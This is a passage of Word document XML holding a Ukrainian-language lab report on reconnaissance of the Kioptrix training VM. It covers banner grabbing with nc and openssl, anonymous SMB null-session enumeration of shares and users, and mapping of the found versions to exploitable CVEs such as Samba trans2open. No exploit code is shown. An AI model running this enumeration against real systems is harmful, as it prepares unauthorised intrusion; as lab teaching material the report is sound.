      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.1.1 — nc 192.168.56.102 22 — SSH banner</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Банер: SSH-1.99-OpenSSH_2.9p2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Протокол 1.99 означає сервер підтримує і SSHv1, і SSHv2 ("compatibility mode").</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenSSH 2.9p2 — версія 2002 року, сотні CVE, включаючи атаки на SSHv1 (CRC32 compensation).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Збіг з Nmap: обидва показують OpenSSH 2.9p2 — розбіжностей немає.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Підключення 2: HTTP (порт 80) — ручний GET-запит</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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76625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.1.2 — Ручний GET / HTTP/1.0 через nc — повні заголовки</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Server header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Це БІЛЬШЕ деталей, ніж дав Nmap — Nmap скоротив рядок у деяких виводах.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Критична знахідка: рядок "mod_ssl/2.8.4 OpenSSL/0.9.6b" в одному заголовку — точна версія для CVE-2002-0082.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Контент: Apache default test page для Red Hat Linux — підтверджує ОС.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Розбіжність: Nmap показав "Apache/1.3.20", nc-banner показав повну рядок із mod_ssl та OpenSSL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Підключення 3: HTTPS (порт 443) — через openssl s_client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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476625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.1.3 — openssl s_client 443 — SSL-інформація</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Спроба nc 443 — з'єднання встановилось, але сервер очікує TLS-handshake і нічого не відправив у відповідь на текст.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Рішення: використано openssl s_client для виконання TLS-handshake та отримання SSL-інформації.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідки: самопідписаний сертифікат, SSLv2 активований (критично застарілий), шифр EDH-RSA-DES-CBC3-SHA, 1024-bit ключ.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SSLv2 вразливий до DROWN-атаки (CVE-2016-0800) — ще один вектор.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Розбіжність з Nmap: nc потребував openssl wrapper, Nmap автоматично провів TLS-handshake.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Завдання 2.2 — Перелік SMB (порт 139)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (13 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Метод 1: smbclient -L (null session)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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81325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.2.1 — smbclient -L 192.168.56.102 -N</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Null-сесія (без облікових даних) дозволена — можна перелічити ресурси анонімно.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знайдені ресурси: IPC$ (IPC Service) та ADMIN$ (IPC Service) — стандартні Samba shares.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Workgroup: MYGROUP, hostname сервера: KIOPTRIX.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ПРОБЛЕМА: smbclient -L не показав версію Samba — переходимо до наступного методу.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Метод 2: enum4linux -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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724275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.2.2 — enum4linux -a 192.168.56.102 — повний перелік</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КЛЮЧОВА ЗНАХІДКА: "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]" — версія виявлена через OS info string!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Користувачі: root (RID 500), john (RID 1000), harold (RID 1001) — цінні для brute force.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Доступ до ресурсів: IPC$ — помилка протоколу, ADMIN$ — Access Denied.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">enum4linux використовує різні підходи (rpcclient, smbclient, nmblookup) — тому знаходить більше, ніж smbclient -L.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Метод 3: Nmap --script smb-enum-shares,smb-enum-users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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28975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.2.3 — Nmap SMB NSE scripts</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smb-enum-shares: IPC$ — Anonymous READ/WRITE, ADMIN$ — Anonymous READ.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">smb-enum-users: john (RID 1000), harold (RID 1001), root (RID 500) — підтверджує enum4linux.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Версія: NSE-скрипти не вивели Samba версію напряму — підтверджено окремим методом.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Метод 4: Metasploit auxiliary/scanner/smb/smb_version (для підтвердження версії)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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733675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 2.2.4 — Metasploit smb_version — Samba 2.2.1a підтверджено</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Результат: "Host is running Unix (Samba 2.2.1a) (workgroup:MYGROUP)" — версія остаточно підтверджена.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Зведення: smbclient дав shares+hostname, enum4linux додав версію та users, Nmap підтвердив users/shares, Metasploit остаточно верифікував версію.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba 2.2.1a вразлива до CVE-2003-0201 (trans2open buffer overflow) — RCE без автентифікації.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Частина 3 — Ідентифікація вразливостей та планування атаки (20 балів)</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Завдання 3.1 — Автоматичне сканування вразливостей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (8 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikto — порт 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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476625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
